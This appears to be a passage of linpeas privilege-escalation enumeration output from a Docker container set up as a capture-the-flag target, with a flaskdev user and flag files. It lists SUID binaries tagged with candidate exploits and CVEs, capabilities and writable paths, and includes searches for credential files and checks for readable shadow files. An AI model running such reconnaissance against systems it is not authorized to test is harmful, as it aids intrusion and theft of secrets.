/usr/share/gnupg/distsigkey.gpg -rw-r--r-- 1 root root 7399 Sep 17 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg -rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg -rw-r--r-- 1 root root 3023 Mar 26 2021 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg -rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg -rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg ╔══════════╣ Analyzing Other Interesting Files (limit 70) -rw-r--r-- 1 root root 3771 Jan 6 2022 /etc/skel/.bashrc -rw-r--r-- 1 flaskdev flaskdev 3771 May 13 03:06 /home/flaskdev/.bashrc -rw-r--r-- 1 root root 807 Jan 6 2022 /etc/skel/.profile -rw-r--r-- 1 flaskdev flaskdev 807 May 13 03:06 /home/flaskdev/.profile ╔════════════════════════════════════╗ ══════════════════════╣ Files with Interesting Permissions ╠══════════════════════ ╚════════════════════════════════════╝ ╔══════════╣ SUID - Check easy privesc, exploits and write perms ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid strace Not Found -rwsr-xr-- 1 root messagebus 35K Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 19K Feb 26 2022 /usr/libexec/polkit-agent-helper-1 -rwsr-xr-x 1 root root 71K Nov 24 12:05 /usr/bin/gpasswd -rwsr-xr-x 1 root root 35K Feb 21 2022 /usr/bin/umount ---> BSD/Linux(08-1996) -rwsr-xr-x 1 root root 72K Nov 24 12:05 /usr/bin/chfn ---> SuSE_9.3/10 -rwsr-xr-x 1 root root 40K Nov 24 12:05 /usr/bin/newgrp ---> HP-UX_10.20 -rwsr-xr-x 1 root root 47K Feb 21 2022 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8 -rwsr-xr-x 1 root root 59K Nov 24 12:05 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997) -rwsr-xr-x 1 root root 44K Nov 24 12:05 /usr/bin/chsh -rwsr-xr-x 1 root root 55K Feb 21 2022 /usr/bin/su -rwsr-xr-x 1 root root 227K Apr 3 18:00 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable -rwsr-xr-x 1 root root 31K Feb 26 2022 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485) ╔══════════╣ SGID ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid -rwxr-sr-x 1 root shadow 23K Feb 2 09:21 /usr/sbin/pam_extrausers_chkpwd -rwxr-sr-x 1 root shadow 27K Feb 2 09:21 /usr/sbin/unix_chkpwd -rwxr-sr-x 1 root shadow 71K Nov 24 12:05 /usr/bin/chage -rwxr-sr-x 1 root shadow 23K Nov 24 12:05 /usr/bin/expiry -rwxr-sr-x 1 root tty 23K Feb 21 2022 /usr/bin/wall -rwxr-sr-x 1 root crontab 39K Mar 23 2022 /usr/bin/crontab ╔══════════╣ Checking misconfigurations of ld.so ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so /etc/ld.so.conf Content of /etc/ld.so.conf: include /etc/ld.so.conf.d/*.conf /etc/ld.so.conf.d /etc/ld.so.conf.d/fakeroot-x86_64-linux-gnu.conf - /usr/lib/x86_64-linux-gnu/libfakeroot /etc/ld.so.conf.d/libc.conf - /usr/local/lib /etc/ld.so.conf.d/x86_64-linux-gnu.conf - /usr/local/lib/x86_64-linux-gnu - /lib/x86_64-linux-gnu - /usr/lib/x86_64-linux-gnu /etc/ld.so.preload ╔══════════╣ Capabilities ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities ══╣ Current shell capabilities CapInh: 0x0000000000000000= CapPrm: 0x0000000000000000= CapEff: 0x0000000000000000= CapBnd: 0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap CapAmb: 0x0000000000000000= ══╣ Parent process capabilities CapInh: 0x0000000000000000= CapPrm: 0x0000000000000000= CapEff: 0x0000000000000000= CapBnd: 0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap CapAmb: 0x0000000000000000= Files with capabilities (limited to 50): /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep ╔══════════╣ Users with capabilities ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities ╔══════════╣ Files with ACLs (limited to 50) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls files with acls in searched folders Not Found ╔══════════╣ Files (scripts) in /etc/profile.d/ ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files total 12 drwxr-xr-x 2 root root 4096 Apr 25 14:06 . drwxr-xr-x 1 root root 4096 May 13 13:16 .. -rw-r--r-- 1 root root 96 Oct 15 2021 01-locale-fix.sh ╔══════════╣ Permissions in init, init.d, systemd, and rc.d ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d ═╣ Hashes inside passwd file? ........... No ═╣ Writable passwd file? ................ No ═╣ Credentials in fstab/mtab? ........... No ═╣ Can I read shadow files? ............. No ═╣ Can I read shadow plists? ............ No ═╣ Can I write shadow plists? ........... No ═╣ Can I read opasswd file? ............. No ═╣ Can I write in network-scripts? ...... No ═╣ Can I read root folder? .............. No ╔══════════╣ Searching root files in home dirs (limit 30) /home/ /home/flaskdev/reboot_flask.sh /home/flaskdev/.bash_history /root/ /var/www /var/www/app /var/www/app/app.py /var/www/dev /var/www/dev/app.py /var/www/config /var/www/config/urandom ╔══════════╣ Searching folders owned by me containing others files on it (limit 100) ╔══════════╣ Readable files belonging to root and readable by me but not world readable ╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files /dev/mqueue /dev/shm /run/lock /tmp /var/tmp ╔══════════╣ Interesting GROUP writable files (not in Home) (max 500) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files ╔═════════════════════════╗ ════════════════════════════╣ Other Interesting Files ╠════════════════════════════ ╚═════════════════════════╝ ╔══════════╣ .sh files in path ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path ╔══════════╣ Executable files potentially added by user (limit 70) 2023-05-13+13:16:03.6132300130 /.dockerenv ╔══════════╣ Unexpected in root /.dockerenv ╔══════════╣ Modified interesting files in the last 5mins (limit 100) ╔══════════╣ Files inside /var/www (limit 20) total 20 drwxr-xr-x 1 root root 4096 May 13 03:06 . drwxr-xr-x 1 root root 4096 May 13 03:06 .. drwxr-xr-x 1 root root 4096 May 13 03:06 app drwxrwxrwx 1 root root 4096 May 13 03:06 config drwxr-xr-x 1 root root 4096 May 13 03:06 dev ╔══════════╣ Files inside others home (limit 20) /home/flaskdev/.bash_logout /home/flaskdev/.bashrc /home/flaskdev/.profile /home/flaskdev/flag.txt /home/flaskdev/reboot_flask.sh /var/www/app/flag.txt /var/www/app/app.py /var/www/dev/app.py ╔══════════╣ Searching installed mail applications ╔══════════╣ Mails (limit 50) ╔══════════╣ Backup files (limited 100) -rw-r--r-- 1 root root 61 Apr 25 14:06 /var/lib/systemd/deb-systemd-helper-enabled/dpkg-db-backup.timer.dsh-also -rw-r--r-- 1 root root 0 Apr 25 14:03 /var/lib/systemd/deb-systemd-helper-enabled/timers.target.wants/dpkg-db-backup.timer -rw-r--r-- 1 root root 147 Dec 5 2021 /usr/lib/systemd/system/dpkg-db-backup.service -rw-r--r-- 1 root root 138 Dec 5 2021 /usr/lib/systemd/system/dpkg-db-backup.timer -rwxr-xr-x 1 root root 2196 May 25 2022 /usr/libexec/dpkg/dpkg-db-backup ╔══════════╣ Web files?(output limit) /var/www/: total 20K drwxr-xr-x 1 root root 4.0K May 13 03:06 . drwxr-xr-x 1 root root 4.0K May 13 03:06 .. drwxr-xr-x 1 root root 4.0K May 13 03:06 app drwxrwxrwx 1 root root 4.0K May 13 03:06 config drwxr-xr-x 1 root root 4.0K May 13 03:06 dev /var/www/app: total 16K ╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70) -rw------- 1 root root 0 Apr 25 14:03 /etc/.pwd.lock -rw-r--r-- 1 root root 220 Jan 6 2022 /etc/skel/.bash_logout -rw-r--r-- 1 flaskdev flaskdev 220 May 13 03:06 /home/flaskdev/.bash_logout ╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70) ╔══════════╣ Searching passwords in history files ╔══════════╣ Searching *password* or *credential* files in home (limit 70) /etc/pam.d/common-password /usr/bin/systemd-ask-password /usr/bin/systemd-tty-ask-password-agent /usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-310.pyc /usr/lib/python3/dist-packages/keyring/credentials.py /usr/lib/python3/dist-packages/launchpadlib/__pycache__/credentials.cpython-310.pyc /usr/lib/python3/dist-packages/launchpadlib/credentials.py /usr/lib/python3/dist-packages/launchpadlib/tests/__pycache__/test_credential_store.cpython-310.pyc /usr/lib/python3/dist-packages/launchpadlib/tests/test_credential_store.py /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-310.pyc /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-310.pyc /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py /usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path /usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path /usr/lib/systemd/system/systemd-ask-password-console.path /usr/lib/systemd/system/systemd-ask-password-console.service /usr/lib/systemd/system/systemd-ask-password-wall.path /usr/lib/systemd/system/systemd-ask-password-wall.service #)There are more creds/passwds files in the previous parent folder /usr/share/pam/common-password /usr/share/pam/common-password.md5sums /var/cache/debconf/passwords.dat /var/lib/pam/password ╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs ╔══════════╣ Searching passwords inside logs (limit 70) base-passwd depends on libc6 (>= 2.34); however: base-passwd depends on libdebconfclient0 (>= 0.145); however: 2023-04-25 14:03:08 configure base-passwd:amd64 3.5.52build1 3.5.52build1 2023-04-25 14:03:08 install base-passwd:amd64 3.5.52build1 2023-04-25 14:03:08 status half-configured base-passwd:amd64 3.5.52build1 2023-04-25 14:03:08 status half-installed base-passwd:amd64 3.5.52build1 2023-04-25 14:03:08 status installed base-passwd:amd64 3.5.52build1 2023-04-25 14:03:08 status unpacked base-passwd:amd64 3.5.52build1 2023-04-25 14:03:09 status half-configured base-passwd:amd64 3.5.52build1 2023-04-25 14:03:09 status half-installed base-passwd:amd64 3.5.52build1 2023-04-25 14:03:09 status unpacked base-passwd:amd64 3.5.52build1 2023-04-25 14:03:09 upgrade base-passwd:amd64 3.5.52build1 3.5.52build1 2023-04-25 14:03:11 install passwd:amd64 1:4.8.1-2ubuntu2 2023-04-25 14:03:11 status half-installed passwd:amd64 1:4.8.1-2ubuntu2 2023-04-25 14:03:11 status unpacked passwd:amd64 1:4.8.1-2ubuntu2 2023-04-25 14:03:12 configure base-passwd:amd64 3.5.52build1 2023-04-25 14:03:12 status half-configured base-passwd:amd64 3.5.52build1 2023-04-25 14:03:12 status installed base-passwd:amd64 3.5.52build1 2023-04-25 14:03:12 status unpacked base-passwd:amd64 3.5.52build1 2023-04-25 14:03:14 configure passwd:amd64 1:4.8.1-2ubuntu2 2023-04-25 14:03:14 status half-configured passwd:amd64 1:4.8.1-2ubuntu2 2023-04-25 14:03:14 status installed passwd:amd64 1:4.8.1-2ubuntu2 2023-04-25 14:03:14 status unpacked passwd:amd64 1:4.8.1-2ubuntu2 2023-04-25 14:03:22 configure base-passwd:amd64 3.5.52build1 2023-04-25 14:03:22 status half-configured base-passwd:amd64 3.5.52build1 2023-04-25 14:03:22 status half-installed base-passwd:amd64 3.5.52build1 2023-04-25 14:03:22 status installed base-passwd:amd64 3.5.52build1 2023-04-25 14:03:22 status unpacked base-passwd:amd64 3.5.52build1 2023-04-25 14:03:22 upgrade base-passwd:amd64 3.5.52build1 3.5.52build1 2023-04-25 14:05:54 configure passwd:amd64 1:4.8.1-2ubuntu2 2023-04-25 14:05:54 status half-configured passwd:amd64 1:4.8.1-2ubuntu2 2023-04-25 14:05:54 status half-installed passwd:amd64 1:4.8.1-2ubuntu2 2023-04-25 14:05:54 status installed passwd:amd64 1:4.8.1-2ubuntu2 2023-04-25 14:05:54 status unpacked passwd:amd64 1:4.8.1-2ubuntu2 2023-04-25 14:05:54 upgrade passwd:amd64 1:4.8.1-2ubuntu2 1:4.8.1-2ubuntu2 2023-04-25 14:06:18 configure passwd:amd64 1:4.8.1-2ubuntu2.1 2023-04-25 14:06:18 status half-configured passwd:amd64 1:4.8.1-2ubuntu2 2023-04-25 14:06:18 status half-configured passwd:amd64 1:4.8.1-2ubuntu2.1 2023-04-25 14:06:18 status half-installed passwd:amd64 1:4.8.1-2ubuntu2 2023-04-25 14:06:18 status installed passwd:amd64 1:4.8.1-2ubuntu2.1 2023-04-25 14:06:18 status unpacked passwd:amd64 1:4.8.1-2ubuntu2 2023-04-25 14:06:18 status unpacked passwd:amd64 1:4.8.1-2ubuntu2.1 2023-04-25 14:06:18 upgrade passwd:amd64 1:4.8.1-2ubuntu2 1:4.8.1-2ubuntu2.1 Commandline: apt-get install --reinstall base-passwd Commandline: apt-get install --reinstall passwd Preparing to unpack .../base-passwd_3.5.52build1_amd64.deb ... Preparing to unpack .../passwd_1%3a4.8.1-2ubuntu2_amd64.deb ... Reinstall: base-passwd:amd64 (3.5.52build1) Reinstall: passwd:amd64 (1:4.8.1-2ubuntu2) Selecting previously unselected package base-passwd. Selecting previously unselected package passwd. Setting up base-passwd (3.5.52build1) ... Setting up passwd (1:4.8.1-2ubuntu2) ... Shadow passwords are now on. Unpacking base-passwd (3.5.52build1) ... Unpacking base-passwd (3.5.52build1) over (3.5.52build1) ... Unpacking passwd (1:4.8.1-2ubuntu2) ... dpkg: base-passwd: dependency problems, but configuring anyway as you requested: ╔════════════════╗ ════════════════════════════════╣ API Keys Regex ╠════════════════════════════════ ╚════════════════╝ Regexes to search for API keys aren't activated, use param '-r'